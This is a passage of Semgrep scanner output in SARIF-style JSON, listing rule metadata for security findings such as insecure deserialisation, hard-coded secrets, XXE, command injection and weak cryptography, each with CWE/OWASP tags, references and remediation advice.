`yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","id":"python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","name":"python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"help":{"markdown":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","id":"ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","name":"ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible."},"help":{"markdown":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.lang.xml.should-resolve-xxe.swift-xxe-prevention)\n - [https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html)\n - [https://mas.owasp.org/MASVS/controls/MASVS-CODE-4/](https://mas.owasp.org/MASVS/controls/MASVS-CODE-4/)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n","text":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible."},"helpUri":"https://semgrep.dev/r/swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","id":"swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","name":"swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: swift.lang.xml.should-resolve-xxe.swift-xxe-prevention"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen."},"help":{"markdown":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n - [https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/](https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/)\n","text":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","id":"swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","name":"swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","properties":{"precision":"very-high","tags":["CWE-272: Least Privilege Violation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`."},"help":{"markdown":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","id":"terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","name":"terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","id":"rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","name":"rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"ERC721 onERC721Received() reentrancy"},"help":{"markdown":"ERC721 onERC721Received() reentrancy\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.erc721-reentrancy.erc721-reentrancy)\n - [https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a](https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a)\n - [https://etherscan.io/address/0x14e0a1f310e2b7e321c91f58847e98b8c802f6ef](https://etherscan.io/address/0x14e0a1f310e2b7e321c91f58847e98b8c802f6ef)\n","text":"ERC721 onERC721Received() reentrancy"},"helpUri":"https://semgrep.dev/r/solidity.security.erc721-reentrancy.erc721-reentrancy","id":"solidity.security.erc721-reentrancy.erc721-reentrancy","name":"solidity.security.erc721-reentrancy.erc721-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.erc721-reentrancy.erc721-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar."},"help":{"markdown":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host)\n - [https://nginx.org/en/docs/http/ngx_http_map_module.html](https://nginx.org/en/docs/http/ngx_http_map_module.html)\n","text":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","id":"generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","name":"generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","properties":{"precision":"very-high","tags":["CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\"."},"help":{"markdown":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n - [https://xerces.apache.org/xerces2-j/features.html](https://xerces.apache.org/xerces2-j/features.html)\n","text":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\"."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","id":"java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","name":"java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","id":"python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","name":"python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.use-of-md5.use-of-md5)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.use-of-md5.use-of-md5","id":"kotlin.lang.security.use-of-md5.use-of-md5","name":"kotlin.lang.security.use-of-md5.use-of-md5","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.use-of-md5.use-of-md5"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","id":"csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","name":"csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","id":"swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","name":"swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.no-null-cipher.no-null-cipher)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.no-null-cipher.no-null-cipher","id":"kotlin.lang.security.no-null-cipher.no-null-cipher","name":"kotlin.lang.security.no-null-cipher.no-null-cipher","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.no-null-cipher.no-null-cipher"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client."},"help":{"markdown":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client."},"helpUri":"https://semgrep.dev/r/javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","id":"javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","name":"javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option."},"help":{"markdown":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","id":"javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","name":"javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input)\n - [https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime.html](https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime.html)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","id":"java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","name":"java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.vm-express.vm-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.vm-express.vm-express","id":"javascript.express.code.vm-express.vm-express","name":"javascript.express.code.vm-express.vm-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.vm-express.vm-express"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead."},"help":{"markdown":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv)\n - [https://nodejs.org/api/crypto.html#cryptocreatecipheralgorithm-password-options](https://nodejs.org/api/crypto.html#cryptocreatecipheralgorithm-password-options)\n - [https://nodejs.org/api/crypto.html#cryptocreatedecipheralgorithm-password-options](https://nodejs.org/api/crypto.html#cryptocreatedecipheralgorithm-password-options)\n","text":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead."},"helpUri":"https://semgrep.dev/r/javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","id":"javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","name":"javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","properties":{"precision":"very-high","tags":["CWE-1204: Generation of Weak Initialization Vector (IV)","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking."},"help":{"markdown":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-regex-dos.check-regex-dos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n","text":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular 